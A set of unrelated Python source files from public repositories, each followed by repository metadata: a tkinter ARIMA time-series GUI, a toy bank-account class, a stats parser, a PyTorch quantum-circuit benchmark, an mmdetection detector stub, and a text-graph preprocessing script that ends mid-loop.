from tkinter import Tk,Button,Label,Frame,Canvas,Entry,Text,StringVar, ttk, filedialog, messagebox import pandas as pd from pandas import datetime, read_csv import numpy as np import matplotlib as mp from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk from matplotlib.figure import Figure import seaborn as sb from statsmodels.tsa.arima_model import ARIMA from sklearn.metrics import mean_squared_error from PIL import ImageTk, Image root = Tk class TimeSeriesAnalysis(Tk): """ Class to manage frames and methods """ def __init__(self, *main): Tk.__init__(self, *main) container = Frame(self) container.pack(side="top", expand=True) container.grid_rowconfigure(0, weight=1) ### allows for frames to expand container.grid_columnconfigure(0, weight=1) self.fileAddress = "" ## creates the variable which will be used fo the main functions to plot/forecast self.frames = {} #### creates dictionary to store alll frames which willl be used pages = (MainMenu, Op1, Op2, Op3, Op4, FileSelection) ### list with all frames for i in (pages): ##for loop to allow all pages to inherit methods from main class frame = i(container, self) self.frames[i] = frame #### allows frames to inherit characteristics of the main class and hence use its methods frame.grid(row=0, column=0, sticky="nsew") # frame.grid_rowconfigure(0,minsize=8,weight=1) frame.grid_columnconfigure(0,minsize=8,weight=1) frame.grid_propagate(False) def show_frame(self, y): frame = self.frames[y] frame.tkraise() def ignore(event): pass ###def savefig(SaveFileAddress): #self.SaveFileAddress = filedialog.asksaveasfilename(initialdir = "/",title = "Select file",filetypes = (("jpeg files","*.jpg"),("all files","*.*"))) class MainMenu(Frame): """ Frame which operated as main menu which allows user to pick options and change file selection """ def __init__(self, parent, controller): Frame.__init__(self, parent) label = Label(self, text="Time Series Analysis") label.pack() im = 
Image.open("C:/Users/Fernando/Documents/NEA/logo.jpg") ## imports logo canvas = Canvas(self,width=50,height=50) canvas.pack() canvas.image = ImageTk.PhotoImage(im) ## uses tkinte library in order to display image on canvas canvas.create_image(25,25,image=canvas.image,anchor="center") ## creates a canvas for which the image wiill be displayed on self.option1button = Button(self,text="Plot time series",command=lambda: ## Button to direct user to frame OP1 controller.show_frame(Op1)) self.option1button.pack() self.option2button =Button(self,text="Plot time series using rolling mean",command=lambda: ## Button t direct user to frame OP2 controller.show_frame(Op2)) self.option2button.pack() self.option3button = Button(self,text="Plot time series using first order differencing",command=lambda: ## Button t direct user to frame OP3 controller.show_frame(Op3)) self.option3button.pack() self.option4button = Button(self,text="Analyse time series using arima model",command=lambda: ## Button t direct user to frame OP4 controller.show_frame(Op4)) self.option4button.pack() self.ChangeFile = Button(self,text="Select/Change input file",command=lambda: ## Button t direct user to frame FileSelection controller.show_frame(FileSelection)) self.ChangeFile.pack() self.exitbutton = Button(self,text="exit",command=lambda: exit()) self.exitbutton.pack() class FileSelection(Frame): """ Frame which allows user to pick and change file selected """ def __init__(self, parent, controller): Frame.__init__(self,parent) label = Label(self, text="File Entry") label.pack(pady=10,padx=10) TempFileA = StringVar() def OpenBrowser(event): self.EnterButton.tk_focusNext().focus() ## changes focus of tkinter in order to prevent from going into a recursive loop with no end casae TempFileA.set(filedialog.askopenfilename(initialdir = "/",title = "Select file",filetypes = (("CSV Files","*.csv"),("all files","*.*")))) ####Opens File browser at computer home directory in order to allow user to select file 
return("break") ##Returns break in order to ensure that focus is changed def GetVarChangeF(): controller.fileAddress = TempFileA.get() ##Gets the value stored in the entry widget which is labeled # TempFileA if len(controller.fileAddress)>1 and controller.fileAddress.endswith("csv"): ##### Allows users to move on when they have entered a valid file address for a file with a .csv extension controller.show_frame(MainMenu) else: controller.fileAddress = "" messagebox.showinfo("Time Series Analysis", "Please enter a valid file address") self.FileEntry = Entry(self,textvariable=TempFileA) ## Create a entry which is used as a storage for the fileAddress so it can be passed to controller later on and used to plot/forecast self.FileEntry.pack(anchor="center") self.FileEntry.bind("<FocusIn>",OpenBrowser) ### Binds when focus is put onnto the fille entry widget to OpenBrowser function self.FileEntry.bind("<FocusOut>",controller.ignore()) ### Ignores focus out event self.EnterButton = Button(self,text="Enter",command = lambda: GetVarChangeF()) ## runs GetVarChangeF functionn self.EnterButton.pack(anchor="center") class Op1(Frame): """ Frame which allows user to plot the standard graph """ def __init__(self, parent, controller): Frame.__init__(self,parent) label = Label(self, text="Plotting a time series") label.pack(anchor = "n", padx=10,pady=10) self.GraphDrawn = False def plot_graph(fileAddress): lf = ttk.Labelframe(self, text='Plot Area') ### Adds plot area label lf.pack() headers = ['date','values'] ### Created a list of the name of the headers which will serve as the axis labels dt=pd.read_csv(fileAddress,header = 0, names=headers,skiprows=1) dt.date = pd.to_datetime(dt.date) ### Turns the date header into actual datetime data type values dt.set_index('date',inplace=True) f = Figure(figsize=(5,5),dpi = 100) ### defines a figure in which to embed the graph ax1 = f.add_subplot(111) ### adds a subplot dt.plot(legend = True,ax=ax1) ### plots graph PlotCanvas = 
FigureCanvasTkAgg(f, self) toolbar = NavigationToolbar2Tk(PlotCanvas,self) PlotCanvas.get_tk_widget().pack(anchor="n",expand = True) PlotCanvas.draw() PlotCanvas._tkcanvas.pack(anchor="n") if self.GraphDrawn == False: self.GraphDrawn = True ###Only allows user to plot graph if it has not yet been plotted for this frame elif self.GraphDrawn == True: PlotCanvas.get_tk_widget().destroy() toolbar.destroy() self.previewButton=Button(self,text=("Preview"),command = lambda: plot_graph(controller.fileAddress)) self.previewButton.pack(anchor = "s" ,pady=1) self.ChangeFile = Button(self,text="Select/Change input file",command=lambda: controller.show_frame(FileSelection)) self.ChangeFile.pack(anchor = "s" ,pady=1) self.HomeButton = Button(self, text="Back to menu",command=lambda: controller.show_frame(MainMenu)) self.HomeButton.pack(anchor = "s" ,pady=1) self.exitbutton = Button(self,text="exit",command=lambda: exit()) self.exitbutton.pack(anchor = "s" ,pady=1) class Op2(Frame): """ Frame which allows user to plot the graph using rolling mean """ def __init__(self, parent, controller): Frame.__init__(self, parent) label = Label(self, text="Plotting time series with rolling mean") label.pack(anchor = "n", padx=10,pady=10) self.GraphDrawn = False def plot_graph(fileAddress): lf = ttk.Labelframe(self, text='Plot Area') ### Adds plot area label lf.pack() headers = ['date','values'] ### Created a list of the name of the headers which will serve as the axis labels dt=pd.read_csv(fileAddress,header = 0, names=headers,skiprows=1) dt.date = pd.to_datetime(dt.date) ### Turns the date header into actual datetime data type values dt.set_index('date',inplace=True) f = Figure(figsize=(5,5),dpi = 100) ### defines a figure in which to embed the graph ax1 = f.add_subplot(111) ### adds a subplot dt.rolling(12).mean().plot(legend = True,ax=ax1) ## Plot the data using rolling mean method canvas = FigureCanvasTkAgg(f, self) ## Defines a canvas which can have a matploblib plot on it canvas.draw() 
##Makes the canvas canvas.get_tk_widget().pack(anchor="center",expand = True) ### Adds the canvas to the frame toolbar = NavigationToolbar2Tk(canvas,self) ## Defines toolbar to be used canvas._tkcanvas.pack(anchor="center",expand = True) self.GraphDrawn == True if self.GraphDrawn == False: self.GraphDrawn = True ###Only allows user to plot graph if it has not yet been plotted for this frame elif self.GraphDrawn == True: canvas.get_tk_widget().destroy() toolbar.destroy() self.previewButton=Button(self,text=("Preview"),command = lambda: plot_graph(controller.fileAddress)) self.previewButton.pack(anchor = "s" ,pady=1) self.ChangeFile = Button(self,text="Select/Change input file",command=lambda: controller.show_frame(FileSelection)) self.ChangeFile.pack(anchor = "s" ,pady=1) self.HomeButton = Button(self, text="Back to menu",command=lambda: controller.show_frame(MainMenu)) self.HomeButton.pack(anchor = "s" ,pady=1) self.exitbutton = Button(self,text="exit",command=lambda: exit()) self.exitbutton.pack(anchor = "s" ,pady=1) class Op3(Frame): """ Frame which allows user to plot the graph of their data using first orderr differencinng """ def __init__(self, parent, controller): Frame.__init__(self, parent) label = Label(self, text="Plot time series using first order differencing") label.pack(anchor = "n", padx=10,pady=10) self.GraphDrawn = False def plot_graph(fileAddress): lf = ttk.Labelframe(self, text='Plot Area') lf.pack() headers = ['date','values'] dt=pd.read_csv(fileAddress,header = 0, names=headers,skiprows=1) dt.date = pd.to_datetime(dt.date) dt.set_index('date',inplace=True) f = Figure(figsize=(5,4),dpi = 100) ax1 = f.add_subplot(111) dt.diff().plot(legend = True,ax=ax1) canvas = FigureCanvasTkAgg(f, self) canvas.draw() canvas.get_tk_widget().pack(anchor="center",expand = True) toolbar = NavigationToolbar2Tk(canvas,self) canvas._tkcanvas.pack(anchor="center",expand = True) self.GraphDrawn == True if self.GraphDrawn == False: self.GraphDrawn = True ###Only allows 
user to plot graph if it has not yet been plotted for this frame elif self.GraphDrawn == True: canvas.get_tk_widget().destroy() toolbar.destroy() self.previewButton=Button(self,text=("Preview"),command = lambda: plot_graph(controller.fileAddress)) self.previewButton.pack(anchor = "s" ,pady=1) self.ChangeFile = Button(self,text="Select/Change input file",command=lambda: controller.show_frame(FileSelection)) self.ChangeFile.pack(anchor = "s" ,pady=1) self.HomeButton = Button(self, text="Back to menu",command=lambda: controller.show_frame(MainMenu)) self.HomeButton.pack(anchor = "s" ,pady=1) self.exitbutton = Button(self,text="exit",command=lambda: exit()) self.exitbutton.pack(anchor = "s" ,pady=1) class Op4(Frame): """ Fame which handles TimeSeries forecasting which shows an image of the forecasted data against the given data and saves it onto a csv called predictions """ def __init__(self, parent, controller): Frame.__init__(self,parent) label = Label(self, text="Analyse time series using arima model") label.pack(anchor = "n", padx=10,pady=10) self.GraphDrawn = False """ fuction which plots graph and makes a figure then packing it """ def plot_graph(dt): lf = ttk.Labelframe(self, text='Plot Area') lf.pack() headers = ['date','values'] f = Figure(figsize=(5,4),dpi = 100) ax1 = f.add_subplot(111) dt.plot(legend = True,ax=ax1) canvas = FigureCanvasTkAgg(f, self) self.GraphDrawn = True canvas.draw() canvas.get_tk_widget().pack(anchor="center",expand = True) toolbar = NavigationToolbar2Tk(canvas,self) canvas._tkcanvas.pack(anchor="center") self.GraphDrawn = True def parser(x): try: return datetime.strptime(x, '%Y-%m-%d') ## Attempts to read the data given by using the format yyyy/mm/dd except: return datetime.strptime(x,'%Y-%m') ## Attempts to read the data given by using the format yyyy/mm def forecast(fileAddress): if self.GraphDrawn == False: messagebox.showinfo("Time Series Analysis", "This will take a minute please wait. 
A file will be output with the prediction on the same location as the program.") series = pd.read_csv(fileAddress, header=0, parse_dates=[0], index_col=0, squeeze=True, date_parser=parser,skiprows = 1) X = series.values size = int(len(X) * 0.6) ## sets the amount of data that is going to be tested (max would be 0.1 min would be 0.9) train, test = X[0:size], X[size:len(X)] ## defines the test data and the data which it will be compared to history = [x for x in train] predictions = list() ### defines a list for which the forecast will be input to for t in range(len(test)): model = ARIMA(history, order=(5,1,0)) ## Runs arima algorithm in order make the model model_fit = model.fit(disp=0) ## Fits the model output = model_fit.forecast() ## Forecasts based on previous data within the window defined by arima yhat = output[0] predictions.append(yhat) obs = test[t] history.append(obs) """ Part of the function which makes a new data fram with the predictions and plots said data frame """ error = mean_squared_error(test, predictions) PredicVals = [] for i in range (int(len(predictions))): PredicVals.append(predictions[i].item()) ##Due to the output of the forecast function being a numpy array in oder for me to plot the graph i have to add them to a list and get the modulous of them headers = ['date','values'] RowsNeedSkip =1+int(len(train)) ##This is to remove the data which is unused for testing dt = read_csv(fileAddress,header = 0, names=headers,skiprows=RowsNeedSkip) #### Imports csv file again but having removed unneeded data dt.insert(2, "Predictions", PredicVals, True) ## inserts data which is needed dt.date = pd.to_datetime(dt.date) ### Turns the date header into actual datetime data type values dt.set_index('date',inplace=True) dt.to_csv('prediction.csv') ### This will save a csv file with the actual and predicted values for the dates plot_graph(dt) elif self.GraphDrawn == True: pass self.opButton = Button(self,text="Time series forecasting using a csv file",command = 
lambda: forecast(controller.fileAddress)) self.opButton.pack(anchor="n") self.HomeButton = Button(self, text="Back to menu",command=lambda: controller.show_frame(MainMenu)) self.HomeButton.pack(anchor="s") self.ChangeFile = Button(self,text="Select/Change input file",command=lambda: controller.Unpack_ShowFrame(FileSelection)) self.ChangeFile.pack(anchor="s") self.exitbutton = Button(self,text="exit",command=lambda: exit()) self.exitbutton.pack(anchor="s") app = TimeSeriesAnalysis() app.mainloop()
FernandoLopezC/TSA
base.py
base.py
py
19,718
python
en
code
0
github-code
36
35401057235
class Bank: def __init__(self,name): self.name=name self.balance=0 def deposit(self): amount=int(input(f"Dear {self.name},Enter the amount that to be deposit : ")) self.balance=self.balance+amount print(f"-->{amount} deposited successfully....") print("Dear ",self.name,", Available balance is :",self.balance) def withdraw(self): amount=int(input("Enter the amount that to be withdraw : ")) if self.balance<amount: print(f"Dear {self.name}, Available balance is :{self.balance}") print("your account balance is not possible.......") else: self.balance=self.balance-amount print(f"{amount} withdraw ") print("Dear ",self.name,", Available balance is :",self.balance) def transfer(self,obj): transfer_amount=int(input(f"Dear {self.name},Enter the amount that to be transfer : ")) if(self.balance < transfer_amount): print("not sufficient balace in your account.....") else: self.balance-=transfer_amount obj.balance+=transfer_amount print(f"Amount {transfer_amount} is successfully Transferd from {self.name} account to {obj.name}") print("Dear ",self.name,", Available balance is :",self.balance) def accountbalance(self): print("Dear ",self.name,", Available balance is :",self.balance) account=Bank("pranit") account.deposit() account.withdraw() account.deposit() account1=Bank("om") account1.deposit() account.transfer(account) account1.accountbalance()
PranitRohokale/My-programs
bank account.py
bank account.py
py
1,612
python
en
code
0
github-code
36
15444060214
#!/usr/bin/env python from __future__ import print_function import sys import argparse def parse_stdin(in_file): d = {} for line in in_file: if ':' in line: split = line.split(':') stripped = [s.strip() for s in split] #if len(stripped) > 2: # print 'Warning: ignoring remaining column in line \'', line, '\'' # the split(' ')[0] is mainly to get rid of the ms info in runtime d[stripped[0]] = stripped[1].split(' ')[0] # Something whent wrong if 'reason' in d: if 'time' in d['reason']: d['runtime'] = 'Timeout' else: d['runtime'] = 'N/A' return d def print_data(d, keys): values = [d[key] for key in keys] s = '&'.join(values) s += '\\\\' print(s) if __name__ == '__main__': argument_parser = argparse.ArgumentParser( description=("A program to parse output form the COCP exercises." " Pipe the input from your experiment file into it, " " like so: ./queens | gather_stats.py.")) # Normally, we would save the results but we're not using them now. argument_parser.parse_args() d = parse_stdin(sys.stdin) print_data(d, keys=['runtime', 'failures'])
amandasystems/cocp-automation-2017
conductor/gather_stats.py
gather_stats.py
py
1,288
python
en
code
0
github-code
36
16821571488
# Author: Bill Pengyuan Zhai. Harvard University. Yelin Group. Oct 2022 from Utils_torch_version import Network, get_nn_pairs, binary_basis, unpacknbits import numpy as np import matplotlib.pyplot as plt from scipy import sparse import scipy import scipy.linalg import qiskit import time import torch import math # try another way of evolving # The sparse H_OP is a sparse.csr matrix. Useful for calculating via scipy diagonalization. Does not involve qiskit classes def initialize_sparse(conn_i, conn_j, a, b, c, d): # print('debug a, b, c, d)',(a, b, c, d)) sx = sparse.csr_matrix(np.array([[0., 1.], [1., 0.]])) sy = sparse.csr_matrix(np.array([[0 , -1j], [1j , 0]])) sz = sparse.csr_matrix(np.array([[1., 0.], [0., -1.]])) id = sparse.csr_matrix(np.eye(2)) # A list of single x, y, z operator applied on the site i_site sx_list = [] sy_list = [] sz_list = [] for i_site in range(N): x_ops = [id] * N y_ops = [id] * N z_ops = [id] * N x_ops[i_site] = sx y_ops[i_site] = sy z_ops[i_site] = sz X = x_ops[0] Y = y_ops[0] Z = z_ops[0] for j in range(1, N): X = sparse.kron(X, x_ops[j], 'csr') Y = sparse.kron(Y, y_ops[j], 'csr') Z = sparse.kron(Z, z_ops[j], 'csr') sx_list.append(X) sy_list.append(Y) sz_list.append(Z) # H_zz = sparse.csr_matrix((2**N, 2**N)) # H_xx = sparse.csr_matrix(np.zeros((2**N, 2**N)), dtype=np.complex128) # H_yy = sparse.csr_matrix(np.zeros((2**N, 2**N)), dtype=np.complex128) # H_xy = sparse.csr_matrix(np.zeros((2**N, 2**N)), dtype=np.complex128) # H_yx = sparse.csr_matrix(np.zeros((2**N, 2**N)), dtype=np.complex128) # H_z = sparse.csr_matrix(np.zeros((2**N, 2**N)),dtype=np.complex128) #H_zzzi = sparse.csr_matrix((2**N, 2**N),dtype=np.complex128) # H_zz = H_zz + sz_list[i] * sz_list[j] H_xx = sx_list[conn_i] @ sx_list[conn_j] H_yy = sy_list[conn_i] @ sy_list[conn_j] H_xy = sx_list[conn_i] @ sy_list[conn_j] H_yx = sy_list[conn_i] @ sx_list[conn_j] H_zzz_id = sparse.csr_matrix(np.eye(2**N), dtype=np.complex128) # This is a diagonal of real numbers for i in 
range(conn_i, conn_j): H_zzz_id = sz_list[i] @ H_zzz_id H_z = - (a/2) * sz_list[conn_i] - (b/2) * sz_list[conn_j] H = H_z + ( (1.0j*c/2) * H_xy - (1.0j*c/2) * H_yx + (d*(1.0j)/2) * H_xx + (d*(1.0j)/2) * H_yy ) @ H_zzz_id # print('H_z', H_z) # print('H_xy',H_xy) # print('H_yx',H_yx) # print('H_xx',H_xx) # print('H_yy',H_yy) # print('debug H', H) # Somehow this doesn't come out to be Hermitian lol # print('debug iH', 1j* H) return H.todense() Ns = [2,4,6,8] reps = 1 avg_time_at_N_fermion, avg_time_at_N_exact = [], [] q_fidelities_all_runs, TVs_all_runs = [], [] for N in Ns: print('start N: ', N) conn_list = [ [np.min(p), np.max(p)] for p in get_nn_pairs(geometry=(N,))]*3 # zero indexed and should not be periodic (not a closed circle) #conn_list = [[i, N-1] for i in range(N-1)]*2 #conn_list = [[0,1]] # conn_list = [] times_fermion = [] times_exact = [] for rep in range(reps): L = len(conn_list) # Number of layers # initiliaze the circuit circuit = Network(conn_list, N) x = torch.tensor([[1,0]*int(N/2)]) if N%2==0 else torch.tensor([[1,0]*int(N/2)+[1]]) # The 1010101... 
single basis state x_string = '10'*int(N/2)+'1' if N%2==1 else '10'*int(N/2) init_state_numpy = qiskit.quantum_info.Statevector.from_label(x_string).data # Fix this, the parameters are defined differently now for the pytorch implementation params_m = torch.tensor(math.pi) * torch.rand((L, 4)) print('params_m',params_m) circuit.manual_set_params(params_m) basis_m_n_half = torch.tensor(binary_basis(geometry=(N//2,))) basis_m_n = torch.tensor(binary_basis(geometry=(N,))) probs = torch.zeros(2**(N//2), dtype=torch.cfloat) # amps = torch.zeros(2**(N), dtype=torch.cfloat) ts = time.time() # sums = torch.sum(basis_m_n, axis=1) # print('sums', sums) # diff = sums-torch.sum(x) # a list of differences in the number of Fermions # print('diff', diff) # indices = (diff == 0).nonzero().flatten() # these are the indices where probability can be nonzero # print('indices', indices) # # Prepare the batches n_batches = len(basis_m_n_half)//10 if len(basis_m_n_half)%10 == 0 else len(basis_m_n_half)//10+1 # n_batches = len(basis_m_n)//10 if len(basis_m_n)%10 == 0 else len(basis_m_n)//10+1 for i in range(n_batches): y_batch = basis_m_n_half[10*i : 10*(i+1)] # y_batch = basis_m_n[10*i : 10*(i+1)] x_batch = x.repeat(y_batch.shape[0], 1) # a batch of 10 sub_mask_batch = (torch.tensor([ [1]*(N//2)+[0]*(N//2) ])).repeat(y_batch.shape[0], 1) # Measure the first half # sub_mask_batch = (torch.tensor([ [1]*N ])).repeat(y_batch.shape[0], 1) print('y_batch, x_batch, sub_mask_batch', (y_batch, x_batch, sub_mask_batch)) probs_batch = circuit.forward_partial_observation(y_batch, x_batch, sub_mask_batch) print('debug probs_batch', probs_batch) # Now put these amp_batch values into correct positions probs[10*i : 10*(i+1)] = probs_batch print('probs', probs) probs = probs.detach().numpy() tf = time.time() times_fermion.append(tf - ts) ts = time.time() exp_iH_exact = np.eye(2**N) for l in range(L): conn = conn_list[l] a, b, c, d = params_m.detach().numpy()[l] H_exact = initialize_sparse(conn[0], 
conn[1], a, b, c, d) exp_iH_exact = (scipy.linalg.expm(-1.0j*H_exact))@exp_iH_exact # 1.0j or -1.0j? state_exact = np.matmul(exp_iH_exact, init_state_numpy[:,None]) tf = time.time() times_exact.append(tf - ts) rho_A = qiskit.quantum_info.partial_trace(state_exact, [i for i in np.arange(N//2)]) # rho_A = qiskit.quantum_info.partial_trace(state_exact, [i for i in np.arange(N//2, N)]) rho_test = qiskit.quantum_info.partial_trace(state_exact, [i for i in np.arange(N-1)]) print('rho_test', rho_test) # rho_A = qiskit.quantum_info.partial_trace(state_exact, []) probs_exact = (np.abs(np.diag(rho_A.data))).squeeze() # probs_exact = (np.abs(state_exact)**2).squeeze() print('rho_A', rho_A) # print('exact evolved state', state_exact) # print('exact evolved prob', probs_exact) probs_fermion = probs # print('fermion state', amps) # print('Fermion probs', probs_fermion) # print('sum Fermion probs', sum(probs_fermion)) plt.plot(probs_exact, '^-') plt.plot(probs_fermion, 'x') plt.legend(['exact probs', 'Fermion_probs']) plt.title('(N, rep)='+str((N, rep))) plt.savefig('img_torch/(N, rep)='+str((N, rep))+'.png') plt.close() # calculate the quantum fidelity #q_fidelity1 = np.abs((np.conjugate(amps).dot(state_exact[:,0])))**2 #print('debug amps', amps) #q_fidelity1 = qiskit.quantum_info.state_fidelity(qiskit.quantum_info.Statevector(amps), rho_A) #fidelity2 = np.abs((np.conjugate(state_exact[:,0]).dot(amps)))**2 #print('q_fidelity', q_fidelity1) print('debug probs_fermion shape', probs_fermion.shape) print('debug probs_exact shape', probs_exact.shape) print('diff', probs_fermion-probs_exact) tv = np.sum(np.abs(probs_fermion-probs_exact)) print('tv', tv) #q_fidelities_all_runs.append(q_fidelity1) TVs_all_runs.append(tv) avg_time_fermion = sum(times_fermion)/reps std_time_fermion = np.std(times_fermion) avg_time_exact = sum(times_exact)/reps std_time_exact = np.std(times_exact) avg_time_at_N_fermion.append(avg_time_fermion) avg_time_at_N_exact.append(avg_time_exact) 
print('avg_time_at_N_fermion', avg_time_at_N_fermion) print('avg_time_at_N_exact', avg_time_at_N_exact) plt.plot(Ns, avg_time_at_N_fermion) plt.plot(Ns, avg_time_at_N_exact) plt.plot(Ns, avg_time_at_N_fermion+std_time_fermion, '+') plt.plot(Ns, avg_time_at_N_fermion-std_time_fermion, '-') plt.plot(Ns, avg_time_at_N_exact+std_time_exact, '^') plt.plot(Ns, avg_time_at_N_exact-std_time_exact, 'v') plt.legend(['avg_time_at_N_fermion', 'avg_time_at_N_exact']) plt.title('Runtime vs N-qubit sizes') plt.savefig('img/Runtime.png') plt.close() # print('q fidelities_all_runs', q_fidelities_all_runs) # plt.plot(q_fidelities_all_runs) # plt.title('q fidelities at all runs') # plt.savefig('img_torch/q_fidelities.png') print('TVs_all_runs', TVs_all_runs) plt.plot(TVs_all_runs) plt.title('TVs at all runs') plt.savefig('img_torch/TVs.png')
BILLYZZ/NFNet
Benchmark_torch_version_partial.py
Benchmark_torch_version_partial.py
py
9,049
python
en
code
1
github-code
36
42335398411
import warnings import torch from mmdet.core import bbox2result from ..builder import DETECTORS, build_backbone, build_head, build_neck from .base import BaseDetector from .single_stage import SingleStageDetector @DETECTORS.register_module() class TestGtDetector(SingleStageDetector): """Base class for single-stage detectors. Single-stage detectors directly and densely predict bounding boxes on the output features of the backbone+neck. """ def __init__(self, backbone, neck=None, bbox_head=None, train_cfg=None, test_cfg=None, pretrained=None, init_cfg=None): super(TestGtDetector, self).__init__(init_cfg) def simple_test(self, img, img_metas, rescale=False, gt_labels=None, gt_bboxes=None): """Test function without test-time augmentation. Args: img (torch.Tensor): Images with shape (N, C, H, W). img_metas (list[dict]): List of image information. rescale (bool, optional): Whether to rescale the results. Defaults to False. Returns: list[list[np.ndarray]]: BBox results of each image and classes. The outer list corresponds to each image. The inner list corresponds to each class. """ import ipdb ipdb.set_trace() feat = self.extract_feat(img) results_list = self.bbox_head.simple_test( feat, img_metas, rescale=rescale) bbox_results = [ bbox2result(det_bboxes, det_labels, self.bbox_head.num_classes) for det_bboxes, det_labels in results_list ] return bbox_results
mengqiDyangge/HierKD
mmdet/models/detectors/single_stage_test.py
single_stage_test.py
py
1,754
python
en
code
32
github-code
36
43194848130
"""Build fixed co-occurrence graphs for the MR (movie review) corpus.

For every document: pad/truncate to ``max_seq_len`` tokens, look up GloVe
embeddings (random OOV vectors otherwise), build a window-based word
co-occurrence adjacency matrix, one-hot encode the label, and pickle the
resulting features / graphs / labels / token-id sentences / vocab.
"""
import pickle as pkl
import numpy as np
from utils import clean_str
import scipy.sparse as sp
from tqdm import tqdm
from utils import clean_str
import torch

# Load pre-trained 300-d GloVe vectors into a word -> list[float] map.
word_embeddings = dict()
with open('glove.840B.300d.txt', 'r') as f:
    for line in f.readlines():
        data = line.split(' ')
        word_embeddings[str(data[0])] = list(map(float, data[1:]))
word_embedding_dim = 300

docs = open("data/mr/mr.clean.txt", 'r')
doc_list = docs.readlines()
docs.close()

# build vocab
word_set = set()
for doc_words in doc_list:
    words = doc_words.split()
    for word in words:
        word_set.add(word)
word_set.add("<pad>")
vocab = list(word_set)
vocab_size = len(vocab)

# One random vector per vocab entry, used for words missing from GloVe.
oov = np.random.uniform(-0.01, 0.01, (vocab_size, word_embedding_dim))

labels = open("data/mr/mr.txt", 'r')
label_list = labels.readlines()
labels.close()

# The label is the last whitespace-separated token of each cleaned line.
labels = []
for i in range(len(doc_list)):
    labels.append(clean_str(label_list[i]).split()[-1])
label_set = set(labels)
label_set = list(label_set)

# Earlier corpus-level implementation, kept (disabled) for reference; it
# built one vocab-sized sparse tensor instead of a per-document matrix.
"""
def dependency_adj_matrix(text, window_size=11, weighted_graph=False):
    # https://spacy.io/docs/usage/processing-text
    doc_len = len(text)
    # sliding windows
    windows = []
    if doc_len <= window_size:
        windows.append(text)
    for i in range(doc_len - window_size + 1):
        window = text[i: i + window_size]
        windows.append(window)
    word_pair_count = {}
    for window in windows:
        for p in range(1, len(window)):
            for q in range(0, p):
                word_p = window[p]
                word_p_id = word_id_map[word_p]
                word_q = window[q]
                word_q_id = word_id_map[word_q]
                if word_p_id == word_q_id:
                    continue
                word_pair_key = (word_p_id, word_q_id)
                # word co-occurrences as weights
                if word_pair_key in word_pair_count:
                    word_pair_count[word_pair_key] += 1.
                else:
                    word_pair_count[word_pair_key] = 1.
                # bi-direction
                word_pair_key = (word_q_id, word_p_id)
                if word_pair_key in word_pair_count:
                    word_pair_count[word_pair_key] += 1.
                else:
                    word_pair_count[word_pair_key] = 1.
    row = []
    col = []
    weight = []
    for key in word_pair_count:
        p = key[0]
        q = key[1]
        row.append(word_id_map[vocab[p]])
        col.append(word_id_map[vocab[q]])
        weight.append(word_pair_count[key] if weighted_graph else 1.)
    for key in range(vocab_size):
        row.append(key)
        col.append(key)
        weight.append(1.)
    adj = sp.csr_matrix((weight, (row, col)), shape=(vocab_size, vocab_size))
    adj = adj.tocoo()
    adj = torch.sparse.FloatTensor(torch.LongTensor([adj.row.tolist(), adj.col.tolist()]),
                                   torch.FloatTensor(adj.data.astype(np.float)))
    # adj = normalize_adj(adj)
    #matrix = np.zeros((vocab_size, vocab_size)).astype('float32')
    #for row in range(doc_len):
    #    for tk in range(doc_len):
    #        matrix[row, tk] += adj[word_id_map[orig_doc[row]], word_id_map[orig_doc[tk]]]
    return adj
"""


def dependency_adj_matrix(text, max_len, window_size=3, weighted_graph=False):
    """Build a normalized (max_len, max_len) token co-occurrence matrix.

    text (list[str])   - document tokens (without padding)
    max_len (int)      - output matrix size; positions >= len(text) stay 0
    window_size (int)  - sliding-window width for counting co-occurrences
    weighted_graph     - if True use raw counts as edge weights, else 1.0
    """
    # https://spacy.io/docs/usage/processing-text
    doc_len = len(text)
    doc_vocab = list(set(text))
    vocab_size = len(doc_vocab)
    word_ids_map = {}
    ids_word_map = {}  # reverse map; built but not read afterwards
    for j in range(vocab_size):
        word_ids_map[doc_vocab[j]] = j
        ids_word_map[j] = doc_vocab[j]
    # sliding windows
    windows = []
    if doc_len <= window_size:
        windows.append(text)
    else:
        for i in range(doc_len - window_size + 1):
            window = text[i: i + window_size]
            windows.append(window)
    word_pair_count = {}
    for window in windows:
        for p in range(1, len(window)):
            for q in range(0, p):
                word_p = window[p]
                word_p_id = word_ids_map[word_p]
                word_q = window[q]
                word_q_id = word_ids_map[word_q]
                if word_p_id == word_q_id:
                    continue
                word_pair_key = (word_p_id, word_q_id)
                # word co-occurrences as weights
                if word_pair_key in word_pair_count:
                    word_pair_count[word_pair_key] += 1.
                else:
                    word_pair_count[word_pair_key] = 1.
                # bi-direction
                word_pair_key = (word_q_id, word_p_id)
                if word_pair_key in word_pair_count:
                    word_pair_count[word_pair_key] += 1.
                else:
                    word_pair_count[word_pair_key] = 1.
    row = []
    col = []
    weight = []
    for key in word_pair_count:
        p = key[0]
        q = key[1]
        # NOTE(review): word_ids_map[doc_vocab[p]] == p by construction, so
        # this is an identity lookup kept from the older implementation.
        row.append(word_ids_map[doc_vocab[p]])
        col.append(word_ids_map[doc_vocab[q]])
        weight.append(word_pair_count[key] if weighted_graph else 1.)
    # Add self-loops with weight 1 on the diagonal.
    for key in range(vocab_size):
        row.append(key)
        col.append(key)
        weight.append(1.)
    adj = sp.csr_matrix((weight, (row, col)), shape=(vocab_size, vocab_size))
    # Expand the per-unique-token graph back to per-position indexing.
    # NOTE(review): element-wise csr indexing inside this double loop is
    # O(doc_len^2) sparse lookups — slow for long documents.
    matrix = np.zeros((max_len, max_len)).astype('float32')
    for row in range(doc_len):
        for tk in range(doc_len):
            matrix[row, tk] += adj[word_ids_map[text[row]], word_ids_map[text[tk]]]
    matrix = normalize_adj(matrix)
    return matrix


def normalize_adj(adj):
    """Symmetrically normalize adjacency matrix."""
    # D^{-1/2} A D^{-1/2}; rows with zero degree get a 0 scale factor.
    rowsum = np.array(adj.sum(1))
    with np.errstate(divide='ignore'):
        d_inv_sqrt = np.power(rowsum, -0.5).flatten()
    d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.
    d_mat_inv_sqrt = np.diag(d_inv_sqrt)
    return adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt)


# Per-document outputs, accumulated over the whole corpus.
all_graphs = []
all_labels = []
all_features = []
all_sentences = []
max_seq_len = 35
for i in tqdm(range(len(doc_list))):
    doc = doc_list[i].lower().strip()
    # doc = clean_str(doc[0]) + " " + clean_str(doc[1])
